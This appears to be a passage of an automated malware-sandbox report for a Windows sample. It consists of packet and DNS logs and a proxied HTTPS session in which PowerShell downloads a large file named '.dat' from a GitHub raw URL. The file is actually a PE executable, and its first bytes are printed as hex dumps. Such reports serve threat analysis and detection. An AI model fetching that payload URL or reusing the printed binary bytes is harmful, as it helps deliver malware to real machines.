                            Sep 3, 2024 08:32:01.058556080 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:01.058561087 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.058584929 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.058599949 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.058615923 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.058640957 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:01.058648109 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.058711052 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:01.058716059 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.058763981 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.058794022 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:01.058803082 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.058842897 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:01.058849096 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.058895111 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.058923006 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:01.058928013 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.058945894 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.058967113 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:01.058974981 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.059029102 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:01.059034109 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.059053898 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.059091091 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:01.059096098 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.059173107 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:01.059178114 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.059197903 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.059257030 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:01.059262037 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.059320927 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:01.059336901 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.059387922 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.059406996 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:01.059412003 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.059475899 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:01.059566021 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:01.059643984 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:01.059650898 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.059689045 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:01.059756041 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:01.268507957 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.268577099 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:01.704520941 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:01.704615116 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:02.536509991 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.536576033 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:02.571846008 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:02.571866035 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.571877956 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.571954966 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:02.571962118 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.571984053 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.571990967 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.572035074 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:02.572061062 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.572065115 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:02.572078943 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.572089911 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.572098017 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.572194099 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:02.572201014 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.572218895 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.572222948 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.572386026 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:02.572393894 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.572403908 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.572443008 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.572473049 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:02.572473049 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:02.572490931 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.572509050 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.572582006 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:02.572588921 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.572618961 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.572674990 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.572700024 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:02.572788954 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:02.572885990 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:02.572938919 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:02.780503035 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:02.830504894 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.040505886 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.040570021 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.246819019 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.246836901 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.246862888 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.246907949 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247041941 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.247051954 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247121096 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247129917 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247154951 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247194052 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247220039 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.247230053 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247241020 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247250080 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247312069 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.247318029 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247327089 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247364998 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247397900 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.247442007 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.247447014 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247466087 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247522116 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.247530937 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247576952 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.247581959 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247617006 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247643948 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.247648001 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247672081 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.247680902 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247695923 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247737885 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.247742891 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247770071 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247777939 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247813940 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247827053 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.247842073 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247868061 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247914076 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.247914076 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.247920036 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247929096 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247946978 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247975111 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.247988939 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.248008013 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.248014927 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.248022079 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.248035908 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.248059988 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.248064041 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.248083115 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.248128891 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.248136997 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.248186111 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.248208046 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.248212099 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.248222113 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:32:03.248292923 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.248377085 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.248454094 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:03.248500109 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:05.060717106 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:05.493745089 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:07.487751961 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:32:07.487788916 CEST44349727185.199.110.133192.168.2.5

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Sep 3, 2024 08:30:30.268985987 CEST5852053192.168.2.51.1.1.1
                            Sep 3, 2024 08:30:30.278929949 CEST53585201.1.1.1192.168.2.5

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Sep 3, 2024 08:30:30.268985987 CEST192.168.2.51.1.1.10xd15eStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Sep 3, 2024 08:30:18.986309052 CEST1.1.1.1192.168.2.50x8efcNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                            Sep 3, 2024 08:30:18.986309052 CEST1.1.1.1192.168.2.50x8efcNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                            Sep 3, 2024 08:30:30.278929949 CEST1.1.1.1192.168.2.50xd15eNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                            Sep 3, 2024 08:30:30.278929949 CEST1.1.1.1192.168.2.50xd15eNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                            Sep 3, 2024 08:30:30.278929949 CEST1.1.1.1192.168.2.50xd15eNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                            Sep 3, 2024 08:30:30.278929949 CEST1.1.1.1192.168.2.50xd15eNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • raw.githubusercontent.com

                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.549727185.199.110.1334436656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            TimestampBytes transferredDirectionData
                            2024-09-03 06:30:30 UTC210OUTGET /panchitopistolesx/items/main/usvcusb.dat HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                            Host: raw.githubusercontent.com
                            Connection: Keep-Alive
                            2024-09-03 06:30:31 UTC903INHTTP/1.1 200 OK
                            Connection: close
                            Content-Length: 96715120
                            Cache-Control: max-age=300
                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                            Content-Type: application/octet-stream
                            ETag: "001e1694e1887967c73c9a0b98c2a94ccd3649176a8a78703e3db55699203a02"
                            Strict-Transport-Security: max-age=31536000
                            X-Content-Type-Options: nosniff
                            X-Frame-Options: deny
                            X-XSS-Protection: 1; mode=block
                            X-GitHub-Request-Id: 8B86:B11A2:153C81:184A72:66D6AD06
                            Accept-Ranges: bytes
                            Date: Tue, 03 Sep 2024 06:30:31 GMT
                            Via: 1.1 varnish
                            X-Served-By: cache-ewr-kewr1740053-EWR
                            X-Cache: MISS
                            X-Cache-Hits: 0
                            X-Timer: S1725345031.849762,VS0,VE456
                            Vary: Authorization,Accept-Encoding,Origin
                            Access-Control-Allow-Origin: *
                            Cross-Origin-Resource-Policy: cross-origin
                            X-Fastly-Request-ID: fb2ea458fac1fbb37aa4311342eb34ac853d8aa2
                            Expires: Tue, 03 Sep 2024 06:35:31 GMT
                            Source-Age: 0
                            2024-09-03 06:30:31 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 14 00 20 1e c8 66 00 6a bd 05 77 25 00 00 f0 00 26 20 0b 02 02 27 00 7a 02 00 00 ee bc 05 00 04 00 00 20 13 00 00 00 10 00 00 00 00 85 45 03 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 40 be 05 00 06 00 00 58 cd c3 05 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd fjw%& 'z E@X`
                            2024-09-03 06:30:31 UTC16384INData Raw: 00 00 48 89 d9 49 89 c1 e8 d3 df ff ff 48 89 c6 e9 f6 00 00 00 0f 1f 00 3c 44 0f 84 60 01 00 00 8d 48 bd 80 f9 01 0f 86 e9 02 00 00 3c 4c 0f 84 dc 01 00 00 3c 55 0f 85 04 02 00 00 0f b6 42 01 3c 6c 0f 84 68 03 00 00 3c 74 0f 85 f0 01 00 00 48 8d 42 01 48 8b 74 24 70 48 89 43 18 80 7a 01 74 0f 85 61 01 00 00 48 8d 4a 02 48 89 4b 18 0f b6 42 02 3c 5f 0f 84 76 04 00 00 3c 6e 0f 84 7d 04 00 00 48 89 d9 e8 d5 e0 ff ff 83 c0 01 0f 88 34 01 00 00 48 8b 4b 18 80 39 5f 0f 85 27 01 00 00 48 83 c1 01 8b 53 28 3b 53 2c 48 89 4b 18 0f 8d 13 01 00 00 48 63 f2 83 c2 01 48 c1 e6 05 48 03 73 20 48 c7 46 04 00 00 00 00 89 53 28 89 46 10 8b 43 38 3b 43 3c c7 06 49 00 00 00 0f 8d e5 00 00 00 48 8b 53 30 48 63 c8 83 c0 01 48 89 34 ca 89 43 38 eb 15 66 2e 0f 1f 84 00 00 00 00
                            Data Ascii: HIH<D`H<L<UB<lh<tHBHt$pHCztaHJHKB<_v<n}H4HK9_'HS(;S,HKHcHHs HFS(FC8;C<IHS0HcH4C8f.
                            2024-09-03 06:30:31 UTC16384INData Raw: 00 00 01 eb aa 49 63 68 18 49 8b 70 10 48 85 ed 0f 84 c4 e0 ff ff 48 8b 81 00 01 00 00 48 01 f5 eb 2c 66 0f 1f 44 00 00 48 89 c2 48 83 c0 01 48 83 c6 01 48 89 83 00 01 00 00 48 39 f5 40 88 3c 13 40 88 bb 08 01 00 00 0f 84 8c e0 ff ff 48 3d ff 00 00 00 0f b6 3e 75 cf ba ff 00 00 00 4c 8b 83 18 01 00 00 c6 83 ff 00 00 00 00 48 89 d9 ff 93 10 01 00 00 b8 01 00 00 00 31 d2 83 83 40 01 00 00 01 eb aa 49 8b 40 10 48 63 68 08 48 8b 30 48 85 ed 0f 84 41 e0 ff ff 48 8b 81 00 01 00 00 48 01 f5 eb 29 0f 1f 00 48 89 c2 48 83 c0 01 48 83 c6 01 48 89 83 00 01 00 00 48 39 f5 40 88 3c 13 40 88 bb 08 01 00 00 0f 84 0c e0 ff ff 48 3d ff 00 00 00 0f b6 3e 75 cf ba ff 00 00 00 4c 8b 83 18 01 00 00 c6 83 ff 00 00 00 00 48 89 d9 ff 93 10 01 00 00 b8 01 00 00 00 31 d2 83 83 40
                            Data Ascii: IchIpHHH,fDHHHHH9@<@H=>uLH1@I@HchH0HAHH)HHHHH9@<@H=>uLH1@
                            2024-09-03 06:30:31 UTC16384INData Raw: 85 c9 75 17 48 81 fe ff 00 00 00 0f 8f 4e 01 00 00 48 83 fe 80 0f 8c 44 01 00 00 4c 89 f1 e8 6d fd ff ff 41 88 36 48 83 c3 0c 4c 39 eb 0f 83 8d 00 00 00 8b 4b 08 8b 03 44 8b 43 04 0f b6 d1 4c 01 e0 83 fa 20 4c 8b 08 4f 8d 34 20 0f 84 26 01 00 00 0f 87 e8 00 00 00 83 fa 08 74 83 83 fa 10 0f 85 e0 01 00 00 41 0f b7 36 81 e1 c0 00 00 00 66 85 f6 0f 89 67 01 00 00 48 81 ce 00 00 ff ff 48 29 c6 4c 01 ce 85 c9 75 1a 48 81 fe 00 80 ff ff 0f 8c c8 00 00 00 48 81 fe ff ff 00 00 0f 8f bb 00 00 00 4c 89 f1 48 83 c3 0c e8 e0 fc ff ff 4c 39 eb 66 41 89 36 0f 82 76 ff ff ff 0f 1f 00 8b 15 fe 35 bc 05 85 d2 0f 8e 51 fe ff ff 48 8b 35 07 5b bc 05 4c 8d 65 fc 31 db 0f 1f 44 00 00 48 8b 05 e1 35 bc 05 48 01 d8 44 8b 00 45 85 c0 74 0d 48 8b 50 10 4d 89 e1 48 8b 48 08 ff d6
                            Data Ascii: uHNHDLmA6HL9KDCL LO4 &tA6fgHH)LuHHLHL9fA6v5QH5[Le1DH5HDEtHPMHH
                            2024-09-03 06:30:31 UTC16384INData Raw: 00 00 83 e0 fd 09 f0 89 43 44 e8 b1 f7 ff ff 4c 89 e1 e8 99 da ff ff 89 e8 48 83 c4 20 5b 5e 5f 5d 41 5c c3 0f 1f 40 00 e8 c3 e5 ff ff 48 85 c0 48 89 c3 75 a3 bd 16 00 00 00 89 e8 48 83 c4 20 5b 5e 5f 5d 41 5c c3 66 0f 1f 84 00 00 00 00 00 41 56 41 55 41 54 55 57 56 53 48 83 ec 30 48 89 cd 48 89 d7 4c 89 c6 4d 89 cc e8 81 e2 ff ff 48 85 c0 48 89 c3 0f 84 0c 02 00 00 48 85 ed 74 0b 48 8b 80 d8 01 00 00 48 89 45 00 4c 8b 2d 1a 1b bc 05 4c 89 63 08 4c 8b 25 ef 19 bc 05 48 89 73 10 31 f6 c7 83 bc 00 00 00 00 00 00 00 c7 43 44 01 00 00 00 48 c7 43 28 ff ff ff ff 4d 89 ee 45 31 c9 45 31 c0 31 c9 ba 01 00 00 00 41 ff d4 48 85 c0 48 89 43 30 75 28 85 f6 75 14 31 c9 be 01 00 00 00 41 ff d6 eb d7 0f 1f 84 00 00 00 00 00 83 c6 01 b9 14 00 00 00 41 ff d5 83 fe 05 75
                            Data Ascii: CDLH [^_]A\@HHuH [^_]A\fAVAUATUWVSH0HHLMHHHtHHEL-LcL%Hs1CDHC(ME1E11AHHC0u(u1AAu
                            2024-09-03 06:30:31 UTC16384INData Raw: fe ff 88 45 ff 80 7d ff 00 74 4f 48 8d 45 d0 48 89 c1 e8 29 a5 00 00 48 89 c3 48 8d 45 d0 48 89 c1 e8 ba a4 00 00 48 89 c2 48 8d 45 ef 48 89 45 f0 90 90 48 8d 4d ef 48 8b 45 20 49 89 c9 49 89 d0 48 89 da 48 89 c1 e8 d4 0f 01 00 48 8d 45 ef 48 89 c1 e8 48 9b 00 00 eb 0c 48 8b 45 20 48 89 c1 e8 fa 0e 01 00 48 8d 45 d0 48 89 c1 e8 9e a5 00 00 eb 2c 48 89 c3 48 8d 45 ef 48 89 c1 e8 1d 9b 00 00 90 eb 03 48 89 c3 48 8d 45 d0 48 89 c1 e8 7b a5 00 00 48 89 d8 48 89 c1 e8 40 8c ff ff 48 8b 45 20 48 83 c4 58 5b 5d c3 90 90 90 90 90 55 53 48 83 ec 68 48 8d 6c 24 60 48 89 4d 20 89 55 28 4c 89 45 30 44 89 4d 38 4c 8b 45 58 8b 4d 50 8b 55 38 8b 45 28 4d 89 c1 41 89 c8 89 c1 e8 6c 0b 00 00 89 45 f8 83 7d f8 00 74 08 8b 5d f8 e9 f1 01 00 00 8b 4d 38 48 8d 45 d0 48 8b 55
                            Data Ascii: E}tOHEH)HHEHHHEHEHMHE IIHHHEHHHE HHEH,HHEHHHEH{HH@HE HX[]USHhHl$`HM U(LE0DM8LEXMPU8E(MAlE}t]M8HEHU
                            2024-09-03 06:30:31 UTC16384INData Raw: c2 48 2b 51 08 4c 39 c2 72 05 48 83 c4 28 c3 4c 89 c9 e8 e9 fb 00 00 90 90 90 90 90 90 90 90 90 48 89 c8 c3 90 90 90 90 90 90 90 90 90 90 90 90 57 56 53 48 83 ec 20 48 89 ce 48 89 d1 48 89 d3 4c 89 c7 e8 e8 54 ff ff 49 89 f8 48 89 da 48 89 f1 49 89 c1 48 83 c4 20 5b 5e 5f e9 00 00 00 00 49 c7 c2 ff ff ff ff 48 8b 41 08 48 85 c0 74 46 48 83 e8 01 4d 89 c2 4c 39 c0 4c 0f 46 d0 4d 85 c9 74 33 48 85 d2 74 2e 4c 8b 19 0f 1f 44 00 00 47 0f b7 04 53 4c 89 c9 48 89 d0 eb 0d 0f 1f 00 48 83 c0 02 48 83 e9 01 74 0c 66 44 3b 00 75 f0 49 83 ea 01 73 da 4c 89 d0 c3 90 90 90 90 90 90 48 8b 02 4c 8b 4a 08 48 89 c2 e9 91 ff ff ff 90 48 c7 c0 ff ff ff ff 4c 8b 49 08 4d 85 c9 74 24 49 83 e9 01 4c 89 c0 48 8b 09 4d 39 c1 49 0f 46 c1 eb 0b 0f 1f 44 00 00 48 83 e8 01 72 06 66
                            Data Ascii: H+QL9rH(LHWVSH HHHLTIHHIH [^_IHAHtFHML9LFMt3Ht.LDGSLHHHtfD;uIsLHLJHHLIMt$ILHM9IFDHrf
                            2024-09-03 06:30:31 UTC16384INData Raw: 8d 4c 24 2c 0f c7 f0 89 01 0f 42 c2 85 c0 74 10 8b 44 24 2c 48 83 c4 38 c3 0f 1f 80 00 00 00 00 41 83 e8 01 75 de 48 8d 0d 63 7e ba 05 e8 6e bc 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 48 83 ec 38 48 89 c8 0f c7 fa 89 54 24 2c 73 10 8b 44 24 2c 48 83 c4 38 c3 0f 1f 80 00 00 00 00 48 8d 4c 24 2c 41 b8 63 00 00 00 f3 90 0f c7 fa 89 11 72 dc 41 83 e8 01 75 f1 48 85 c0 74 06 31 c9 ff d0 eb cf 48 8d 0d 3e 7e ba 05 e8 0f bc 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 48 83 ec 38 48 8d 4c 24 2c ff 15 5d 5d bb 05 85 c0 75 09 8b 44 24 2c 48 83 c4 38 c3 48 8d 0d ea 7d ba 05 e8 d8 bb 00 00 90 90 90 90 90 90 90 90 48 83 ec 38 0f c7 f8 89 44 24 2c 73 13 8b 44 24 2c 48 83 c4 38 c3 66 2e 0f 1f 84 00 00 00 00 00 48 8d 54 24 2c b9 63 00 00 00 f3 90 0f c7 f8
                            Data Ascii: L$,BtD$,H8AuHc~nH8HT$,sD$,H8HL$,AcrAuHt1H>~H8HL$,]]uD$,H8H}H8D$,sD$,H8f.HT$,c
                            2024-09-03 06:30:31 UTC16384INData Raw: 48 83 ec 38 4c 8b 52 08 48 8b 12 4c 89 d0 4c 29 c0 4c 39 c8 49 0f 47 c1 4d 39 c2 72 19 4e 8d 0c 02 48 89 44 24 20 4c 8b 41 08 31 d2 e8 8f e8 ff ff 48 83 c4 38 c3 48 8d 15 41 41 ba 05 4d 89 d1 48 8d 0d 31 40 ba 05 e8 94 65 00 00 90 90 90 90 48 83 ec 38 48 8b 42 08 4c 8b 41 08 48 89 44 24 20 4c 8b 0a 31 d2 e8 55 e8 ff ff 48 83 c4 38 c3 48 83 ec 38 45 0f be c0 49 89 d1 31 d2 44 89 44 24 20 4c 8b 41 08 e8 45 f0 ff ff 48 83 c4 38 c3 56 53 48 83 ec 38 4d 8b 08 48 89 ce 48 89 d3 49 8b 48 08 48 2b 1e 48 8b 46 08 48 39 d8 72 20 48 89 4c 24 20 45 31 c0 48 89 da 48 89 f1 e8 fe e7 ff ff 48 8b 06 48 01 d8 48 83 c4 38 5b 5e c3 48 8d 15 79 40 ba 05 49 89 c1 49 89 d8 48 8d 0d 95 3f ba 05 e8 f8 64 00 00 90 90 90 90 90 90 90 90 56 53 48 83 ec 38 41 b9 01 00 00 00 48 89 d3
                            Data Ascii: H8LRHLL)L9IGM9rNHD$ LA1H8HAAMH1@eH8HBLAHD$ L1UH8H8EI1DD$ LAEH8VSH8MHHIHH+HFH9r HL$ E1HHHHH8[^Hy@IIH?dVSH8AH
